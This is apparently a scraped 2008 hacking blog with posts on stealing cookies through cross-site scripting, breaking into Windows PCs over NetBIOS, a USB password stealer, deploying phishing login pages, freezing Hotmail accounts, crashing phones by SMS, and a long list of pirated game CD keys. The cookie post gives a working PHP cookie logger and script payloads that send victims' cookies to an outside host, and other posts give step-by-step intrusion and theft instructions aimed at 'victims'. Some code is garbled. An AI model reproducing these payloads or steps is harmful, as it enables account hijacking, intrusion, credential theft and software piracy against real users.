Anda di halaman 1dari 73

Cookie Stealing

Posted in Snarfing with tags cookie snarf, how to steal cookies on August 12, 2008 by hacktocrack

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of
information is stored in a cookie. Go to a website that requires a login, and after
logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)

After you press enter, you should see a pop-up window with some information in it
(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an

example of what might be in your cookie:

Code:
username=CyberPhreak;

password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found that
allowed for someone to view other people’s cookies, every user account is possibly
compromised. You’ll be hard-pressed to find a site with cookies like these. However, it
is very common (unfortunately) to find sites with hashes of passwords within the cookie.
The reason that this is unfortunate is because hashes can be cracked, and oftentimes
just knowing the hash is enough.

Now you know why cookies are important; they usually have important information
about the user in them. But how would we go about getting or changing other users’
cookies? This Is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
you need to have a way of sending the cookie to your script. Writing the script to accept
the cookie is the easy part, whereas finding a way to send it to your script is the hard
part. I’ll show you an example of a pHp script that accepts cookies:

Code:
<?php
$cookie=$_GET['cookie'];
$log=fopen(”log.txt”,“a”);
fwrite($log,$cookie.”\n”);
fclose($log);
?>
And there you have it, a simple cookiestealer. The way this script works is that it accepts
the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then
saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php

is the filename of the script we just wrote, ? lets the script know that we are
going to pass some variables to it, and after that we can set cookie equal to whatever
we want, but what we want to do is set cookie equal to the cookie from the site. This
is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your
own code. XSS deals with finding exploits within filters, allowing you to put your own
code into a website. This might sound difficult, and in most cases it’s not easy, but
it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code
into the website. Some examples of these types of sites are forums, guestbooks, any site
with a “member profile”, etc. And any of these sites that have users who log in also
probably use cookies. Now you know what sort of sites might be vulnerable to
cookiestealing.

Let’s assume that we have a website that someone made. This website has user login
capability as well as a guestbook. And let’s also assume that this website doesn’t have
any kind of filtering on what can be put into the guestbook. This means that you can
put HTML and Javascript directly into your post in the guestbook. I’ll give you an
example of some code that we could put into a guestbook post that would send the user’s
cookie to out script:

Code:
<script>
document.location=‘http://yoursite.com/steal.php?cookie=’+document.cookie;
</script>

Now whenever someone views the page that you posted this on, they will be redirected to
your script with their cookie from this site in the URL. If you were to look at log.txt
now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this
site got smart, and decided to filter out script tags. Now you code doesn’t work, so
we have to try and evade the filter. In this instance, it’s easy enough:

Code:
<ahref=”jvoid(document.location=’http://yoursite.com/steal.php?cookie=’+
document.cookie)”>Click Me</a>
In this case, when the user clicks on the link they will be sent to your stealer with their
cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get
around filters.

Restart your friend’s phone using sms


Posted in hacking, offline hacking with tags hack phone with sms, how to restart phone, how to restart
phone using sms, restart phone on August 4, 2008 by hacktocrack

Here is a new trick to restart ur friends mobile via sms

with this trick only 1110,1110i,1112,1100,2100 can be restarted.

just type

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text msg and send it to ur friend having cells mention above and see wat happens.

Exploit SQL Server System


Posted in Hardcore Hacking, Website hacks, hacking with tags hack sql, sql, sql hack, sql hacking, sql
injection, sql server system on August 4, 2008 by hacktocrack

Whether it is through manual poking and prodding or the use of security testing tools,
malicious attackers employ a variety of tricks to break into SQL Server systems, both
inside and outside your firewall. It stands to reason then, if the hackers are doing it, you
need to carry the same attacks to test the security strength of your systems. Here are 10
hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall
protection for the entire world to see (and access). DShield’s Port Report shows just how
many systems are sitting out there waiting to be attacked. I don’t understand the logic
behind making a critical server like this directly accessible from the Internet, but I still
find this flaw in my assessments, and we all remember the effect the SQL Slammer worm
had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can
lead to denial of service, buffer overflows and more.
2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web
application or the database system itself. Anything from missing SQL Server patches to
Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be
uncovered by attackers and lead to database server compromise. The bad guys may use
open source, home-grown or commercial tools. Some are even savvy enough to carry out
their hacks manually from a command prompt. In the interest of time (and minimal wheel
spinning), I recommend using commercial vulnerability assessment tools like
QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics
(for Web application scanning) and Next Generation Security Software Ltd.’s
NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer
the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows
some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe
deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for
SQL Server system(s) and determine version numbers (somewhat). This works even if
your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow
can occur when an overly long request for SQL Servers is sent to the broadcast address
for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases.
Unfortunately, in many cases, no cracking is needed since no password has been assigned
(Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool
mentioned earlier. The commercial products AppDetective from Application Security Inc.
and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial
equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities
found during normal vulnerability scanning. This is typically the silver-bullet hack for
attackers penetrating a system and performing code injection or gaining unauthorized
command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don’t properly
validate user input. Malformed SQL queries, including SQL commands, can be inserted
directly into Web URLs and return informative errors, commands being executed and
more. These attacks can be carried out manually — if you have a lot of time. Once I
discover that a server has a potential SQL injection vulnerability, I prefer to perform the
follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in
Figure 3.
Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the
same basic fashion as standard SQL injection. The big difference is that the attacker
doesn’t receive feedback from the Web server in the form of returned error messages.
Such an attack is even slower than standard SQL injection given the guesswork involved.
You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4,
comes in handy.
Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses
and so on. In this sample chapter from the excellent book Exploiting Software: How to
Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse
engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL
Server errors — such as “Incorrect syntax near” — leaking from publicly accessible
systems. Several Google queries are available at Johnny Long’s Google Hacking
Database. (Look in the sections titled Error Messages and Files containing passwords.)
Hackers use Google to find passwords, vulnerabilities in Web servers, underlying
operating systems, publicly available procedures and more that they can use to further
compromise a SQL Server system. Combining these queries with Web site names via
Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in.
Specifically, developers may store SQL Server authentication information in ASP scripts
to simplify the authentication process. A manual assessment or Google could uncover this
information in a split second.

NetBios Hacking
Posted in hacking, offline hacking with tags hack netbios, hacking netbios, how to hack netbios, netbios,
netbios hacking, what is netbios on August 2, 2008 by hacktocrack

For this tutorial, I used Microsoft’s Windows XP Home Edition OS

What is it?

NetBIOS Hacking is the art of hacking into someone else’s computer through your
computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a
LAN or WAN to share folders, files, drives, and printers.

How can this be of useful to me?

Most people don’t even know, but when they’re on a LAN or WAN they could possibly
have their entire hard drive shared and not even know. So if we can find a way into the
network, their computer is at our disposal.

What do I need?

Windows OS
Cain and Abel

CODE
(http://www.oxid.it/downloads/ca_setup.exe)

————–

So first off we need to find a computer or the computer to hack into. So if your plugged
in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This
program has a built in sniffer feature. A sniffer looks for all IP addresses in the local
subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop
sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then
click ok.
It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP
address of the computer you are going to be breaking into. If you can’t tell whether the IP
address is a computer, router, modem, etc, that’s ok. During the next step we will begin
our trial and error.
Part2, Trial and Error

Now, we don’t know if we have our designated target, or if we have a computer or


printer, or whatever else is on the LAN or WAN. If you did get the IP of the target
though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok. This should bring up the
command prompt. From here we will do most of the hacking. Now I will be referring to
certain commands that need to be inputted into the command prompt. I will put these
commands in quotes, but do not put the quotes in the code when you type it into the
prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in
“ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This
will tell us if the target is online. If it worked, it will look something like this (note, I have
colored out private information):
IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the
target is online, then we can proceed.
Part3,GatheringtheInformation.

Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there
is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually
very important, without this, the hack would not work. So, let me break it down from the
top to bottom. I will just give the first line of information, and then explain the paragraph
that follows it.

The information right below the original command says: “Local Area Connection,” this
information tells us about our connection through the LAN, and in my case, I am not
connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network
Connection 2:” It gives us information about the connection to the target through WAN.
In my case I am connected through the WAN, so it was able to find the Node IpAddress.
The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells
us if it is shared, and gives us the computer name. Sometimes it will even give us the
currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer
I am trying to connect to. If you look to the right you should see a <20>. This means that
file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name,
then you have reached a dead end and need to go find another IP, or quit for now. Below
BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about
which one is the workgroup, and the computer, look under the Type category to the right
of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or
computer. If it is GROUP, then it is the workgroup

Step4,BreakingIn
———————————————————————————————–

Finally it’s time. By now we know: that our target is online, our target has file sharing,
and our target’s computer name. So it’s time to break in. We will now locate the shared
drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under Type, it
says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can
sometimes be an entire person’s hard drive.

All’s that is left to do is “map” the shared drive onto our computer. This means that we
will make a drive on our computer, and all the contents of the targets computer can be
accessed through our created network drive. Type in “net use K: \\(IP Address of
Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.”
Ok, let’s say that you plan on doing this again to a different person, do u see the “K after
“net use?” This is the letter of the drive that you are making on your computer. It can be
any letter you wish, as long as the same letter is not in use by your computer. So it could
be “net use G…,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead. You may
also do the same for multiple hacks. If it worked, it will say “The command completed
successfully.” If not, you will have to go retrace you steps. Now open up “my computer”
under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive,
hence the name Network Drive. The drive will not be deleted after you disconnect
though, but you won’t be able to access it until you reconnect to the network. So if you
are doing this for the content of the drive, I recommend dragging the files and folders
inside of the drive onto your computer, because you never know if the target changes the
sharing setting. If you are just doing this to hack something, then go explore it and have
some well deserved fun!
Congratulations!You’reDONE!
But, before you leave, please look over some of this information for further help and just
for thanks to me.

-Commands used in this tutorial:

PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

4 Comments »

Game CD Keys
Posted in Uncategorized with tags cd keys, download keygen, game cd keys, keygen, software cd keys on
August 2, 2008 by hacktocrack

1503 A.D. The New World serial: 0705-7933859-6725970-0015


Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQ
Al Qaeda Hunting 3D serial: 23822
Back and White Br serial : 0901-3324366-4702210-2081
Battlefield 1942 Serial : 5000-0000000-0000000-1318
Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277
Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CM
Battlefield 2: TW99-NWBV-0PVZ-EAEI-JVTL
BLACK & WHITE BR - 0901-3324366-4702210-2081
Black & White: Creature Isle serial: 1740-9488245-5171152-1858
Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6
CLIVE BARKER’S UNDYING - 2500-0911911-0911911-2705
Comanche 4 serial: 3s2d-flt1-cls2-rule-7865
Command & Conquer Generals: Zero Hour Expansion:
ULPF-ZEVK-FRWG-Q4YJ-6F2T
Command & Conquer: Renegade serial: 056894-929488-118387-9679
COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674
Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708
Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832
Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K
Delta Force 3: Land Warrior - s/n: N5E3-YXH2-G983-9WYB-B3ZS
Delta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27
Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZ
Delta Force Black Hawk Down: Team Sabre (Expansão)
Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAY
Serial: AV4E-YVQE-NACM-DD3M-KBW3
DELTA FORCE: LAND WARRIOR - N33G-6HM2-9Y8F-HD4U-M7S9
Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B
DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5E
Dominius II Serial: 1111-1111-1111-064
Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5
Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999
Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252
F1 2002 SERIAL: 7931-9865028-6024865-1156

F1 champiship season 2000 serial: 2000-5005241-5005241-6839


FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650
FIFA 2003 BR: BL7G-929A-2YXE-UFZZ
FIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEV
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
FREEDOM FORCE: 1439-8808778-3837107-2854
Frontline Attack - War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2
Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XT
GLOBAL OPERATIONS: 5000-0000000-0000000-5021
Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542
half life couter strike serial: 2462-92319-7642
half life edição especial:UCF1840810021327
half life opposing force serial: 2708-43011-3332 ou UCF1840810021327
HALF LIFE: UCF1840810021327
HALF-LIFE - 2420-92220-4482
HALF-LIFE: COUNTER-STRIKE - 2462-92319-7642
HARRY POTTER : 0901-7014788-4117807-0206
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
HARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052
Heli Heroes - serial: 8bnk-c9eh-63hb-kj88
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Homeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385
homeworld: BAB2-BAB2-CEZ8-TAC3-9978
Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485
IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510
James Bond 007: NightFire Serial : 1740-9488245-5171152-5578
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhc
Kingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVG
Lego Soccer Mania serial: 1500-0776239-9370523-4726

madden nfl 2001: 1500-6610360-1643530-0243


Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911
Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827
Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49
Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068
MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663
Microsoft Flight Simulator 2002 - Airport 2002 Volume 1serial use:
A221-A24AABAA-FDBA5DD9
Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d0-

2250
MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5P
nascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667
NASCAR RACING 4 - GAC7 REB8 TUX6 DAC2 7833
Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAM
Nascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSW
NBA LIVE 2001 - 2001-0020601-0010978-6694
NBA Live 2001 CD Key: 2001-0020601-0010978-6694
NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGT
Need For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEV
Neverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-
RDJTG
NHL 2002: 1000-2003004-0000000-4904
NHL 2004: 6T22-8L62-6666-8666-6666
O.R.B:SERIAL: JTRV74NVVKUJX7AM
Operation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYL
CL0T7 513NT
OUT LIVE BR: c9523c-1a4466-237cb8-dc7e67
Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYU

QUAKE III Arena - THWT37AB3P7JBTPC


QUAKE III Team Arena - TSBH 7CCG DPWP B2LT 84
QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGT
Return to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88
Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XT
Roller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETND
S.W.A.T. 3 - Elite Edition - TED4-SAB4-DUB7-CYJ2-8652
Sacrifice serial: xxxx-xxxx-xxxx-xxxx
Sail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25C
Savage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5
Sega GT Serial : GTJ08010-322007-01723
Serial do Tiger: 1500-3202255-2068109-2932
Shogun 2: CDKEYS = 0901-3721384-6427058-7026
Shogun Total War Serial : 1600-0052410-0052410-6424
SIM CITY 3000 UNLIMITED BR - 5001-9781634-6520278-1000
Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4E
simcity 4 serial: GRUS-4528-8217-1ULF
Simcoaster serial : 2001-0013101-0010978-2823
SIMGOLF: 5000-0000000-0000000-5071
SOLDIER OF FORTUNE 2: 3Z4J - J3PP - K848 - EWPK - 1F
SOLDIER OF FORTUNE GOLD - BEN6-MUC8-BEZ6-BUJ6-3764
Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFD
Spy Hunter Serial: SHU3E7RVCCRBFHSS
Star Trek Elite Force 2 - TFAK-7WCH-44RH-YJ7X-F9E9
Star Trek StarFleet Command : Orion Pirates Serial :
4008-B491-1DC3-0F6C
starfleet command 3 serial: 0000-0000-0000-K28K
STARTRECK: RYS8-LAB4-JEF8-BYM3-4652
Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248
SUPERBIKE 2001 - 1500-4288423-2982915-3163
Team Factor SERIAL: 2NKZYY9-2SKAKSC
Terminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA

THE SIMS BR - 100486-585530-905808-0928


THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138

5500-7457886-5179416-4991
throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387
Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045
TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLC
Tony Hawks Pro Skater 4: P4EPBTIQDAIH7WXM
Total Club Manager 2003 serial : 1500127097911060657818
Train Simulator - The Activities Serial: 6850-YV6AYS6B
Trainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911
Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858
Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera ser
um 0″
Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNEN
War! Age of Imperialism: 1101-8603-2629-7418

Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947


Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94G
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
MSEE-5EL4-WYBB-DGLU-GDEV
6Q7F-WAAC-8QTH-WLC4-EDEV
Q3N6-2X4N-A4EA-NY64-GDEV
GJGQ-4SLL-EA4Y-FJSU-UDEV
5LM5-M22H-45YT-W88Z-2DEV
C6U4-7A49-4CE2-MUGL-8DEV
BH4U-GCNX-WMJ8-ZGKY-4DEV
KAU4-AVFV-34AK-782Y-4DEV
Y3QQ-TUGW-4NU4-ZG68-6DEV
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Pinnacle Instant Video Album V1.01 Multilanguage: 7777777777
The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEV
PSB3-DLW5-3GPV-P8BU-HDEV
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
CIVIL 3D V2004: 400-00000000
War! Age of Imperialism: 1101-8603-2629-7418
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
Cakewalk MediaWorks Serial: CWMW1.00-009968
Neato MediaFace Serial: 7135be-1339bd-1a33-5c670
NHL 2004: 6T22-8L62-6666-8666-6666
FQ22-BXTP-FLT!-ELT!-FLT!
CHYQ-AVKH-CRKD-GRKD-CRKD
BZ8G-WCOL-L8JD-SUXM-LTBV
A75V-8YSW-JQ75-NE79-LC4W
ZZGY-JQVB-PJ4T-6K6K-4INY
B233-BN2E-BUL3-87C5-4YZA
AWZH-HVNV-P8FK-XHPQ-8EUJ
J4LL-PZID-QZEM-RPQ2-UHRF
RKRR-R3C4-QWP8-QUXI-96KC

1 Comment »

Cloning Hard Drives


Posted in hacking with tags clone hard drive, cloning hard drives, hack, hacking, hacking tips and tricks,
how to clone hard drive on August 2, 2008 by hacktocrack

Did know that you could clone your current Hard Drive without having to by extra
software? Maybe you didn’t know that all that you needed, was already set up on your
current system? Well, it is… and if you follow this tut, you shouldn’t have much of a
problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in
this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If
you have an Antivirus program, do a thorough sweep with the AV first, then do the
Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a
thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click
your mouse onto the “Full” button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button
that says “Autofix Errors”.

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure
that you can do it without making any mistakes:
Click on the “Start” button, then click on the “Run…” button, then place the following
into the Runbox:

“XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter”
button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When
its all finished, pull the original Master from the system, designate the Slave as the
Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you
really shouldn’t have any problems. If, by any chance, you should come across a snag,
message me and I’ll walk you through it.

2 Comments »

USB Password Stealer


Posted in Easy Hacking, Password Hacking, hacking, offline hacking with tags hack passwords, hack
windows password, hack xp, hack xp password, licence stealer, password hacker, Password Hacking, steal
passwords, steal usb passwords, usb hacking, usb hacks, usb password stealer, usb theif, usbtheif, xp hacks
on July 30, 2008 by hacktocrack

Tweaked USB that steals every passwords including licences.

Instructions
1.Decompress the archive and put all the files located in the folder “USBThief”into a
USB.
2.Insert the USB in your victim’s computer.
3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

3 Comments »

Protect yourself from fake login pages


Posted in Password Hacking with tags fake login pages, hacking, hacking tips, how to make fake login
pages, how to phish, learn how to phish, login phishing, phishing, protect yourself from phishing on July
26, 2008 by hacktocrack
Using fake login pages is the easiest way to hack passwords. Identifying a fake login
page is very easy but many people neglect to do some small checks before entering the
login details and fall in the trap. I have seen a person paying 500$ for a fake login page
of paypal. This proves that there are still people falling in this trap. This is just an
example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …
This post is an attempt to show what a hacker does to hack your password using fake
login pages and how to protect yourself from those fake logins.I will try to keep this post
as simple as possible, there may be some technical details which you can safely skip.
Warning: I strongly advice you not to try this on anyone it may spoil your relation with
the person on whom you are trying it and you may even end up behind the bars.

What goes on behind when you enter your login details in login form??

When you enter your login details in any login form and hit enter they are submitted to
another page which reads these login details and checks the database if you entered the
correct username and passowrd, if yes then you will be taken to your account else you
will get an error page.
What an hacker does??

A hacker creates a fake page which looks exactly same as the original page and some
how tricks you to enter your login details in that page. These login details are then
submitted to a file.At this stage the hacker has two optionsHe can either store the login
details on his server or he can directly get them mailed to his email id. All the above said
things happen behind the scenes, you will have no clue of it. When you enter you login
details for the first time your details are submitted to the hacker and you will be directed
to a error page ( this is the original error page). When you enter ur login details again you
will be logged in to your account. It’s quite common for us to enter the login details
wrongly sometimes so you will not become suspicious when you get the error page.

How to identify fake login page traps ??

1. Never enter you login details in unknown sites.


2. Always type the address directly in to the browser.
3. Do not follows the links you get in mails and chatting even if they are from your
friends
4. Always have a keen look in the address bar and verify if the address is correct.
Check the screen shot below. Some people buy doamins which look simliar to the
original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some
times you may over look these small differences and fall in trap.
5. Please do report to the hosting site or the original site owner when you find a fake
login page.
6. If you feel like you entered your details in a fake login page change your
password immediatley.

Now let’s go on with the trick..


You have to upload the fake login page on some server with php support. There are many
free web hosting services available on the net, first sign up for anyone of them.Google for
some free webhosting services,you will find many. Upload the files in the zipped folder
on to your server and give the link of the fake login page to the person whose password
you want to know. When the person enters his email id and password in to the fake login
page they will be stored in a HTML file named “passwd.htm” on your server in the same
directory where you uploaded the login page. Check that text file to get the passwords
you wanted.

Here is the demo of the trick

Note:Don’t enter your actual password

click this link to view the fake login page of yahoo

The password you entered is saved into this page

1 Comment »

Hacktocrack Is Back Online!


Posted in Uncategorized on July 26, 2008 by hacktocrack

Hey Everyone

This Blog Had Been Suspended For A Few Months.

I finally hacked my own blog to unsuspend it..

I have no Idea if this site might get suspended again..

but anyways I will try to keep it for as long as possible…

I have to Moderate over 400 comments Now lol.

Will Start Posting again soon…

Hacktocrack has an official site at www.ageniusblog.com

check it out!

Leave A Comment »
Create Folders And Files With NO! Name
Posted in Easy Hacking, Notepad Tricks, Other, hacking tips, offline hacking with tags create file with no
name, create folder with no name, Create Folders And Files With NO! Name, free tips, hacking, hacking
tips, hacking tricks on April 5, 2008 by hacktocrack

This trick will allow you to create files and folders without any name.

Just follow the following steps:


1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the
numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right
side of the keyboard. Don’t type the numbers which are present on top of the character
keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.


2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press
0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we’ve had a problem with deleting these folders, to do so, start your computer in safe
mode and delete it from there.)

8 Comments »

Ice Cold Reloaded


Posted in Easy Hacking, Email, Hotmail with tags hack hotmail, hack msn hotmail, how to hack, how to
hack hotmail, msn freezer on April 5, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives
you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail
inbox. It includes support for the latest MSN Messenger Protocol.
Download Link http://download.download-free-software.net/IceCold_ReLoaded

12 Comments »

Test - Hack Into this page


